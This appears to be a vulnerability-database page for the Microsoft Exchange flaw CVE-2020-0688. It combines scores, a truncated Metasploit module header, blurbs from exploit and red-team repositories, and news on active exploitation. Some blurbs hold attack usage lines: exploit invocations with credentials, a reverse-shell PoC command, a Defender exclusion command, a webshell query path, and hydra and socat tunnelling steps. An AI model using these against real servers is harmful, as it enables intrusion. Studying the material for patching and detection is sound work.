CVE-2020-0688

Published: 11/02/2020 Updated: 12/07/2022
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 945
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.

Vulnerable Products

microsoft exchange server 2013

microsoft exchange server 2016

microsoft exchange server 2019

microsoft exchange server 2010

Exploits

# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution
# Date: 2020-02-28
# Exploit Author: Photubias
# Vendor Advisory: [1] portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688
# [2] www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsof ...
##
# This module requires Metasploit: metasploit.com/download
# Current source: github.com/rapid7/metasploit-framework
##
require 'bindata'
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  # include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  D ...

Mailing Lists

Microsoft Exchange 2019 version 15.2.221.12 suffers from an authenticated remote code execution vulnerability ...
This Metasploit module exploits a .NET serialization vulnerability in the Exchange Control Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis, resulting in all installations using the same validationKey and decryptionKey values. With knowledge of these values, an attacker can craft a s ...
This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the Background Intelligent Transfer Service (BITS), to overwrite C:\Windows\System32\WindowsCoreDeviceInfo.dll with a malicious DLL containing the attacker's payload. To achieve code execution as the SYSTEM user, the Update Session Orchestrat ...

Github Repositories

PowerShell script to help with domain enumeration - written while doing the 'Advanced Red Team' lab from pentesteracademy

Invoke-Recon PowerShell script as a first step for domain enumeration. Tries to spot quick wins. Just because I'm tired of typing the same AD / PowerView commands over and over. Prerequisites: You may want to exclude your tools directory from Defender (if you clone submodules, for example): Add-MpPreference -ExclusionPath "C:\Users\bleponge\Documents\myrepos" Get-MpP

I made this script for conducting CVE-2020-0688 more rapidly. It helps to improve checking the vuln, hugely reducing the steps for that.

cve-2020-0688 I made this script for conducting CVE-2020-0688 more rapidly. It helps to improve checking the vuln, hugely reducing the steps for that. Modify these inputs before running the file: url = "mail.something.com" #input 1* command = "cmd /c echo OOOPS!!! > c:/truongtn.txt" #input2* aspsession = "1111a11c-11ad-1c11-1111-1111122f5977

This AD attacks CheatSheet, made by RistBS, is inspired by the Active-Directory-Exploitation-Cheat-Sheet repo. It is the first version of this repo; many things will be added later, so stay tuned! :D Active-directory-Cheat-sheet Summary AD Exploitation Cheat Sheet by RistBS Summary Tools Powershell Components Powershell Tricks PSWA Abusing Enumeration GPO enumeration ACL

Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"

CVE-2020-0688 Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability" Usage: powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml <XAML PATH> -uri <default|liveiderror|> Example: This is an example of vulnerability validation by setting a header in the response: powershell -exec bypass

CVE-2020-0688 A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time. Knowledge of the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM. About Vulnerability The bug is found in the Exchange

winddows-Active-Directory-Cheatsheet A cheatsheet to help during intrusion steps in a Windows environment. Summary: Tools, Enumeration, Pre auth: Find valid users, Find valid credentials, AS REP Roast, Responder; Post auth: Domain info, Powerview, Bloodhound, Ldeep, SPNs; Privilege Escalation: PowerUp, WinPeas, FullPower, PrintSpoofer, Potatoes, DNS Admin Abuse, Backup Operato

CCF - Cyber Crime and Forensics course: Incident response on cyber incidents: Acquisition and network analysis: Wireshark, Brim. File system and OS artifacts analysis: AccessData FTK, Autopsy, Event Log Explorer. Memory analysis: Capa, volatility. Sandboxing and static analysis of malware: Anyrun, hybrid analysis, cuckoo sandbox, ghidra, IDA, Windbg. Nobelium APT SolarWinds Inci

A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.

Description A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA scripts. The current gadget triggers a call to Activator.CreateInstance() when deserialized using BinaryFormatter from jscript/vbscript/vba; this means it can be used to trigger execution of your .NET assembly of choice

PoC RCE Reverse Shell for CVE-2020-0688

CVE-2020-0688 Working Exploit PoC (CVE-2020-0688) - Reverse Bind Shell. Tested using Python 2.7. To install: pip install -r requirements.txt To run: python CVE-2020-0688-POC.py 1016124 -lhost 10111 -lport 4444

PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell

PSForgot2kEyXCHANGE PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell. Usage: This PoC requires a valid username and password. This PoC uses ysoserial.net to create the new ViewState which contains the command you specified in the -Command param. If you don't already have this installed on your system, download it here. PS> .\PSForgot2kEyXCHANGE.ps1

CVE-2020-0688 CVE-2020-0688_Microsoft Exchange default MachineKeySection deserialize vulnerability

Proxylogon-106370718 Proxylogon incident: Microsoft last week released patches for Exchange Server vulnerabilities that were under attack by hackers; tens of thousands of organisations worldwide may be affected. The domain was tied to a compromised Exchange mail server, which the attackers later used as a C&C relay, leading to a subsequent encryption (ransomware) incident. Severity: enterprises worldwide widely use Microsoft

cve-2020-0688 Usage: usage: cve-2020-0688.py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Passwor

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

justtest

Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys

Scans for Microsoft Exchange Versions with masscan

CVE-2020-0688-Scanner This script scans an IP/range/CIDR and outputs the Microsoft Exchange Servers and versions discovered. The specified IP/range/CIDR will be scanned with masscan on port tcp/443. After a successful scan it tries to HTTP GET "/owa/auth/logon.aspx" with curl to grab the Outlook Web Access page source for build versions to display. On Small Business S

CVE-2020-0688 - Exchange

python3 CVE-2020-0688.py mail.chinabaiker.com username@domain.com password command

A command line tool to search AttackerKB.

AKB-Explorer A command line tool to search AttackerKB. How to install: Not much to do, you just have to clone the repo and install the required python libraries: git clone github.com/horshark/akb-explorer/ pip install -r requirements.txt Then you need to add your AKB API key in config/api.txt. You can retrieve it from your AKB profile: echo "YOUR_AKB_API_KEY_HERE

Homework-of-C-Sharp C Sharp code from my blog. Shellcode.cs: uses CreateThread to run shellcode. ShellcodeBase64.txt: Base64 of the shellcode (msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp). ReadShellcode.cs: reads ShellcodeBase64.txt and launches the shellcode. DumpLsass.cs: source code is github.com/GhostPack/SafetyKatz, with some functions of th

CVE-2020-0688 PoC

ecp_slap This proof-of-concept for CVE-2020-0688 includes functions for the scanning and exploitation of a vulnerable on-prem Exchange instance. Usage: scan - provide credentials and target information to obtain the cookies required for exploitation and save them to 'cookies.txt'. Also checks for exposure of the Exchange Control Panel (ECP) service for the targeted Excha

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"

CVE-2020-0688_EXP Auto trigger payload & encrypt method

CVE-2020-0688_EXP CVE-2020-0688_EXP Auto trigger payload python3 CVE-2020-0688_EXP.py -h usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e] optional arguments: -h, --help show this help message and exit -s SERVER, --server ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PA

Support: This AD attacks CheatSheet, made by RistBS, is inspired by the Active-Directory-Exploitation-Cheat-Sheet repo. It is the first version of this repo; many things will be added later, so stay tuned! :D Information: some courses will be in French because I don't have time to translate everything, but don't worry, it will be translated in some time. Red Team Bib

A curated list of awesome C-Sharp frameworks, libraries and software.

awesome-c-sharp A curated list of awesome C-Sharp frameworks, libraries and software. CodeHubApp/CodeHub - CodeHub is an iOS application written using Xamarin. mxgmn/WaveFunctionCollapse - Bitmap & tilemap generation from a single example with the help of ideas from quantum mechanics. dotnet-architecture/eShopOnContainers - Cross-platform .NET sample microservices and c

weaponized tool for CVE-2020-0688

weaponized tool for CVE-2020-0688 (Microsoft Exchange 2010 MRMAutoTagModel unsafe deserialize vulnerability) build: install .NET Framework 3.5 first, then make. usage: CVE-2020-17144 <target> <user> <pass> After exploit, access [target]/ews/soap/?pass=whoami to get command execution. And you can also modify ecs as a customize e

Exchange study: collected and wrote some Exchange scripts. CheckInfo: detects vulnerabilities based on the Exchange version and patch date. Version identification: get the short version via the owa endpoint; get the full version via the /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application endpoint; get the full version from the X-OWA-Version response header of the /owa/service and /owa endpoints. Brute force /ec

Some intranet penetration tips compiled in early 2018; updates slowed down afterwards, so they are published here in the hope of maintaining them together with the community.

Author: Evi1cg Blog: evi1cg.github.io Table of Contents: Information gathering; Open-source intelligence (OSINT): github, whois lookup / registrant reverse lookup / email reverse lookup / related assets, google hacking; Building an enterprise password dictionary: dictionary lists, password generation, obtaining email lists, leaked password lookup; Gathering information on the enterprise's external assets: subdomain enumeration; Getting into the intranet: based on weak enterprise accounts

Used during red team engagements; modified from Ridter's https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration Tips Modified by: z3r0yu Blog: zeroyu.xyz PS: the main additions are some techniques from my own red team work. Table of Contents: Information gathering; Open-source intelligence (OSINT): github, whois lookup / registrant reverse lookup / email reverse lookup / related assets, google hacking; Building an enterprise password dictionary: dictionary lists, password generation, obtaining email lists, leaked password lookup

General Security Scripts

GeneralSecurityScripts --> Please note, unless mentioned otherwise, all scripts work on both Linux and Windows, and for Python 2 or 3 (look at the first line). GetNessusHomeCode.py: Automated registration for a new Nessus Home Feed license. DownloadNessus.py: Automated script for downloading the most recent Nessus version (Linux version only). rdpstrip.py: Automated MitM scri

Used during red team engagements; modified from Ridter's https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration CheetSheets Modified by: z3r0yu Blog: zeroyu.xyz Table of Contents: Information gathering; Open-source intelligence (OSINT): github, whois lookup / registrant reverse lookup / email reverse lookup / related assets, google hacking; Building an enterprise password dictionary: dictionary lists, password generation, obtaining email lists, leaked password lookup; Gathering information on the enterprise's external assets: subdomain enumeration

A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Es

Summary Active Directory Exploitation Cheatsheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalation Useful Local Priv Esc Tools Lateral Movement Powershell Remoting Remote Code Execution with PS Credentials Import a powershell module and execute its functions remotely Executing Remote St

adPEAS adPEAS is a PowerShell tool to automate Active Directory enumeration. In fact, adPEAS is like a wrapper for different other cool projects like PowerView, Empire, Bloodhound and some own written lines of code. As said, adPEAS is a wrapper for other tools. They are almost all written in pure PowerShell, but some of them are included as a compressed binary blob or C# code. adPE

Scripts to scan for Microsoft Exchange Vulnerabilities In 2021 several dangerous and widely exploited vulnerabilities for Microsoft Exchange servers have been published This repository provides scripts to scan for CVE-2021-26855: The SSRF vulnerability which is the entry point for the ProxyLogon exploit chain CVE-2021-34473: The pre-auth path confusion which is the entry poi

Unclaimed victims: 1-grid.com Andersonautomotive.com Xerox Ticket Master Group Angelino Rockford School District HUDSON PROPERTIES GRANT & WEBER Koons Automotive SDIGC HOULE ELEC GROUPDOMAIN Perennials Fabrics Skecoplant.com Guardiacivil.es Birkenstock.com BTC/BECH32 addresses: 1HtyXyCrshiJmLYNru7atpDMJrzG9mzwzf 1FWWRT88WjYbZp4NoRNEBgTGjRxhi2J9YM 15gjb8F5Zd8XR

Powershell tool to automate Active Directory enumeration.

adPEAS adPEAS is a PowerShell tool to automate Active Directory enumeration. In fact, adPEAS is like a wrapper for different other cool projects like PowerView, Empire, Bloodhound and some own written lines of code. As said, adPEAS is a wrapper for other tools. They are almost all written in pure PowerShell, but some of them are included as a compressed binary blob or C# code. How

Generic assessment template

Pentest Template 1) Setup attacking machine: # NOTE: icmp and udp can't be proxied via proxychains! # setting up, socks, port forwarding for payload delivery ssh -f -N -D <LOCALIP>:<LOCALPORT> root@<REMOTEIP> # from local box socat TCP-LISTEN:<LOCALPORT>,bind=<LOCALIP>,fork,reuseaddr TCP:<RE

CS2020 repository MSEL concepts: DMZ # initial access firewall cve (out of scope?) python3 pfsense_auth_2.2.6_exec.py localhost:65535 nc <IP> # initial access firewall (lockout feature!) web-proxy, ftp, dns, and web-conf proxychains hydra -L ~/users.txt -P ~/passwords.txt <IP> ssh -u -V; # shell to dmz boxes via ssh ssh <USER>@

A record of articles read online in 2020

Penetration: Seagate Central Storage remote code execution 0-day; NSA firmware vulnerability hunting; SKF labs: GraphQL bugs, JWT, SSRF, SSTI vulnerable environments, which can be used together with the github.com/D0g3-Lab/H1ve vulnerable environment; hydra usage: new usage, cracking passwords through a tor proxy; stealing NTLMv2 hashes by abusing SQL injection in a file download feature; obtaining NTLMv2 hash values through injection; persistence

This is an open source Snort rules repository

SnortRules This is an open source Snort rules repository for exploit and application detection signatures Exploit Rules: CVE-2020-0618 CVE-2020-0688 CVE-2020-1938 CVE-2020-10189 CVE-2020-3952 CVE-2020-5902 CVE-2020-1350 CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)

Deserialization payload generator for a variety of .NET formatters

A proof-of-concept tool for generating payloads that exploit unsafe .NET object deserialization. Description: ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver progra

Compiled binaries and ready code for Red Teaming

Red Team Binaries Compiled binaries and ready-to-use code for red teaming. *References: github.com/GhostPack github.com/rootm0s/WinPwnage github.com/0xbadjuju/WheresMyImplant github.com/hfiref0x/UACME github.com/RhinoSecurityLabs/Aggressor-Scripts pentestmag.com/simpleshellcodeinjector-ssi/ Exploits krbtgt.pw/dacl-permis

AD_Pentest Red team | summary of important domain penetration vulnerabilities (continuously updated). Welcome to join the free Zhishixingqiu group "Cybersecurity Growth Camp" to discuss techniques: t.zsxq.com/08Ac3CEkC [TOC] Directly take the domain controller: MS14-068 Kerberos authentication, no PAC: when a user requests a TGT (the identity credential produced by the ticket-granting service) from the Kerberos Key Distribution Center (KDC), they can forge their own Kerberos ticket

Active Directory Exploitation Cheat Sheet This cheat sheet contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheat Sheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Remote BloodHound On Site BloodHound Useful

AD_Pentest Red team | summary of important domain penetration vulnerabilities (continuously updated). Welcome to join the free Zhishixingqiu group "Cybersecurity Growth Camp" to discuss techniques: t.zsxq.com/08Ac3CEkC Contents: Directly take the domain controller: MS14-068 CVE-2020-1472 CVE-2021-42287&42278 CVE-2021-1675/CVE-2021-34527 CVE-2019-1040 Domain delegation attacks NTLM Relay ADCS vulnerability -- ESC8 (PetitPotam) (ADCS relay) ADCS vulnerability -- CVE

Active Directory Exploitation Cheat Sheet This cheat sheet contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheat Sheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Remote BloodHound On Site BloodHound Using

Detections by Author Author Count DNIF 138 community 127 Total 265 Detections by Directory Directory Count /Advanced Threat Detection/Windows Process Monitoring 119 /Advanced Threat Detection/Proxy Monitoring 29 /Advanced Threat Detection/Webserver Exploits 9 /Cloud Security/Amazon Web Services 13 /Advanced Threat Detection/DNS Monitoring 4 /Cloud

Active-Directory-Exploitation-Cheat-Sheets This cheat sheet contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheat Sheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Remote BloodHound On Site BloodHound Useful

CVEs enumerated by FireEye that should be addressed to limit the effectiveness of the leaked Red Team tools: CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 10.0 CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 10.0 CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN

vFeed CVEs Vulnerability Indicators that should be addressed to limit the effectiveness of the leaked FireEye Red Team tools: CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 10.0 CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 10.0 CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Forti

cisa_AA22-011A Test Cases - Understanding and Mitigating Russian State-Sponsored Cyber Threats to US Critical Infrastructure Vulnerabilities known to be exploited by Russian state-sponsored APT actors for initial access include: CVE-2018-13379 FortiGate VPNs CVE-2019-1653 Cisco router CVE-2019-2725 Oracle WebLogic Server CVE-2019-7609 Kibana CVE-2019-9670 Zimbra software CVE

Pentest-Tools General useful Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

AD-Pentesting-Tools Pentest-Tools General useful Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vul

Pentesters-toolbox General useful Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scan

Pentest-Tools Windows Active Directory Pentest General useful Powershell Scripts github.com/S3cur3Th1sSh1t/WinPwn - github.com/dafthack/MailSniper github.com/putterpanda/mimikittenz github.com/dafthack/DomainPasswordSpray github.com/mdavis332/DomainPasswordSpray - same but kerberos auth for more stealth and lockout-sleep github

Windows Active Directory penetration testing Technical notes and list of tools, scripts and Windows commands that I find useful during internal penetration tests (Windows environment/Active Directory) The output files included here are the results of tools, scripts and Windows commands that I ran against a vulnerable Windows AD lab that I created to test attacks/exploits and d

Ladon 9.1.1 20211108 Program introduction Ladon is a multi-threaded plug-in comprehensive scanni

Useful Pentest tool links

Pentest-Tools Red-Team-Essentialss General useful Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vu

Conti-Clear Extracted data & information from the Conti & TrickBot leaks. The beginning: Well, since Tob Trick started leaking Conti chats and conversations, most people started translating them using translators like Deepl or Google Translate. You can find the original + translated chats of the Conti TrickBot Leaks here: conti-leaks-englished After tha

A compilation of vulnerabilities in key systems commonly encountered in red team operations.

Compilation of vulnerabilities in key systems that are easily attacked in red team engagements. 1. OA systems: Weaver (Weaver-Ecology-OA): Weaver OA E-cology RCE (CNVD-2019-32204) - affects versions 7.0/8.0/8.1/9.0; Weaver OA WorkflowCenterTreeData interface injection (Oracle databases only); Weaver ecology OA database configuration information disclosure; Weaver OA Yunqiao arbitrary file read - affects multiple 2018-2019 versions; Weaver e-cology OA front-end SQL injection vul

Middleware-Vulnerability-detection Continuously updated collection of usable, up-to-date vulnerability exploits, for authorized penetration testing only. On 2020.4.18 two partners joined to maintain the project: @caizhuang @3ndz Apache --2019 Apache-flink unauthorized access arbitrary --2019 CVE-2019-0193 Apache-Solr via Velocity template RCE --2020.3 CVE-2019-17564 Apache-Dubbo deserialization vulnerability --

A collection of CVE, CMS and middleware vulnerability detection and exploitation tools. Since 2019-9-15

Master-Cheat-Sheet General useful Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scan

Red team operator field manual

Red team operator practical manual. Statement Author : By klion Date : 2020215 Message : may every day after 2020 go well. Motivation for sharing: first, to provide a more comprehensive and practical reference for both the "attack" and "defense" sides. As the old saying goes, "if you do not know attack, how can you know defense"; anyone who talks only about "attack" or only about "defense" is a charlatan; be capable of both attack and defense

Penetration_Testing_POC A collection of POCs, scripts, tools, articles and other techniques used in penetration testing, kept as notes; contributions welcome. Penetration_Testing_POC Please use search [Ctrl+F] to find things. IOT Device&Mobile Phone Web APP Privilege escalation helpers PC tools - small utilities collection Articles/books/tutorials Notes Please use search [Ctrl+F] to find things. IOT Device&Mobile

Middleware-Vulnerability-detection On 2020418 the project gained two co-maintainers, @caizhuang and @3ND. Apache --2019 Apache-flink unauthorized access, arbitrary --2019 CVE-2019-0193 Apache Solr via Velocity template RCE --20203 CVE-2019-17564 Apache Dubbo deserialization vulnerability --20207 CVE-2020-13925 Apache Kylin remote command execution

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASL ASP ASPNET ActionScript Arduino Assembly AutoHotkey Batchfile BitBake Boo C C# C++ CMake CSS Classic ASP CoffeeScript Dart Dockerfile Emacs Lisp Erlang F# Go HCL HTML Haskell Java JavaScript Jupyter Notebook KiCad Kotlin Logos Lua M Makefile Markdown Mask Max Nginx Nim OCaml Objective-C Obj

Collected for public use

Information gathering Host information gathering Sensitive directory and file discovery Directory brute-forcing Wordlists BurpSuite Search engine syntax Google Hack DuckDuckgo (can search sites such as Weibo and Renren that block the mainstream search engines) Bing JS files leaking back-end or API information Quick search of third-party resources findjs robotstxt Directory listing accessible ( autoindex ) IIS short filenames IIS-ShortName-Scanner

Recent Articles

Microsoft Patch Tuesday – February 2020
Symantec Threat Intelligence Blog • Preethi Koroth • 12 Feb 2023

This month the vendor has patched 99 vulnerabilities, 13 of which are rated Critical.

Posted: 12 Feb, 2020 • 4 Min Read

As always, customers are advised to follow these security best practices:

Install vendor patches as soon as they are available.
Run all so...

APT41 Spies Broke Into 6 US State Networks via a Livestock App
Threatpost • Lisa Vaas • 09 Mar 2022

USAHerds – an app used (PDF) by farmers to speed their response to diseases and other threats to their livestock – has itself become an infection vector, used to pry open at least six U.S. state networks by one of China’s most prolific state-sponsored espionage groups.
In a report published by Mandiant on Tuesday, researchers described a prolonged incursion conducted by APT41. They detected the activity in May 2021 and tracked it through last month, February 2022, observing the spy g...

US Military Ties Prolific MuddyWater Cyberespionage APT to Iran
Threatpost • Lisa Vaas • 13 Jan 2022

U.S. Cyber Command has confirmed that MuddyWater – an advanced persistent threat (APT) cyberespionage actor aka Mercury, Static Kitten, TEMP.Zagros or Seedworm that’s historically targeted government victims in the Middle East – is an Iranian intelligence outfit.
The link has been suspected, and now it’s government-stamped. On Wednesday, USCYBERCOM not only confirmed the tie; it also disclosed the plethora of open-source tools and strategies MuddyWater uses to break into target sys...

Top CVEs Trending with Cybercriminals
Threatpost • Becky Bracken • 16 Jul 2021

Criminal small talk in underground forums offers critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.
An analysis of such chatter, by Cognyte, examined 15 cybercrime forums between Jan. 2020 and March 2021. In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.
“Our findings reveal...

Widespread Brute-Force Attacks Tied to Russia’s APT28
Threatpost • Lisa Vaas • 02 Jul 2021

U.S. and U.K. authorities are warning that the APT28 advanced-threat actor (APT) – a.k.a. Fancy Bear or Strontium, among other names – has been using a Kubernetes cluster in a widespread campaign of brute-force password-spraying attacks against hundreds of government and private sector targets worldwide.
The joint alert (PDF) – posted on Thursday by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the U.K.’s National Cybe...

Android banking malware sharply increased in the first chunk of 2021, reckons ESET
The Register • Gareth Corfield • 04 Jun 2021

Claims Russia's FSB was poking around an Eastern European ministry

While enterprises stagger under sustained ransomware attacks, Android users are increasingly being targeted by banking malware, with Slovakian infosec firm ESET reckoning it had seen a 159 per cent increase in such malicious software over the last few months.
Even though banking malware aimed at users of the Google mobile OS sharply increased in popularity, overall mobile threat detections on the Google-owned operating system declined by 18.8 per cent quarter-on-quarter, said ESET.
...

US think tank breached three times in a row by SolarWinds hackers
BleepingComputer • Ionut Ilascu • 17 Dec 2020

An advanced hacking group believed to be working for the Russian government has compromised the internal network of a think tank in the U.S. three times.
Incident responders from cybersecurity company Volexity investigating the attacks between late 2019 and July 2020 named the threat actor Dark Halo, a versatile adversary capable of quickly switching to different tactics and techniques to carry out long-term, stealthy operations.
In one attack, Dark Halo leveraged a newly disclosed vuln...

Nation-state hackers breached US think tank thrice in a row
BleepingComputer • Ionut Ilascu • 17 Dec 2020

An advanced hacking group believed to be working for the Russian government has compromised the internal network of a think tank in the U.S. three times.
Incident responders from cybersecurity company Volexity investigating the attacks between late 2019 and July 2020 named the threat actor Dark Halo, a versatile adversary capable of quickly switching to different tactics and techniques to carry out long-term, stealthy operations.
In one attack, Dark Halo leveraged a newly disclosed vuln...

Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks
Threatpost • Tara Seals • 21 Oct 2020

Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities – with a Pulse VPN flaw claiming the dubious title of “most-favored bug” for these groups.
That’s according to the National Security Agency (NSA), which released a “top 25” list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of Cactus Pete, TA413, Vicious Panda and Winniti.
The Feds...

Microsoft Exchange Servers Still Open to Actively Exploited Flaw
Threatpost • Lindsey O'Donnell • 30 Sep 2020

Over half of exposed Exchange servers are still vulnerable to a severe bug that allows authenticated attackers to execute code remotely with system privileges – even eight months after Microsoft issued a fix.
The vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft’s mail server and calendaring server. The flaw, which stems from the server failing to properly create unique keys at install time, was fixed as part of Microsoft’s February Patc...

Over 247K Exchange servers unpatched for actively exploited flaw
BleepingComputer • Sergiu Gatlan • 29 Sep 2020

More than 247,000 Microsoft Exchange servers are yet to be patched against the CVE-2020-0688 post-auth remote code execution (RCE) vulnerability impacting all Exchange Server versions under support.
The CVE-2020-0688 RCE flaw exists in the Exchange Control Panel (ECP) component — enabled in default configurations — and it enables potential attackers to remotely take over vulnerable Exchange servers using any valid email credentials.
Microsoft addressed the security issue as part ...

Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs
Threatpost • Lindsey O'Donnell • 14 Sep 2020

The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.
Patches are currently available for all these flaws – and in some cases, have been available for over a year – however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the...

What do F5, Citrix, Pulse Secure all have in common? China exploiting their flaws to hack govt, biz – Feds
The Register • Shaun Nichols in San Francisco • 14 Sep 2020

Beijing's snoops don't even need zero-days to break into valuable networks

The US government says the Chinese government's hackers are preying on a host of high-profile security holes in enterprise IT equipment to infiltrate Uncle Sam's agencies and American businesses.
Yes, this sounds like something from the Department of the Bleeding Obvious – spies do spying on all sides, and all that – but what's interesting in this latest warning is the roll call of vulnerable products being targeted.
In a joint statement, the FBI and Homeland Security's Cybersecu...

Microsoft’s Patch Tuesday Packed with Critical RCE Bugs
Threatpost • Tara Seals • 08 Sep 2020

Microsoft has released patches for 129 security bugs in its September Patch Tuesday update. These include 23 critical flaws, 105 that are important in severity and one moderate bug. Fortunately, none are publicly known or under active exploitation, Microsoft said.
The most severe issue in the bunch is CVE-2020-16875, according to researchers. This is a memory-corruption problem in Microsoft Exchange that allows remote code-execution (RCE) just by sending an email to a target. Running arbit...

Enjoyed the US Labor Day weekend? Because it's September 2020 and Exchange Server can be pwned via email
The Register • Shaun Nichols in San Francisco • 08 Sep 2020

Don't be so smug, Mac users, you're open to an InDesign project file

A nightmare flaw for Exchange Server headlines this month's Patch Tuesday lineup from Microsoft and others.
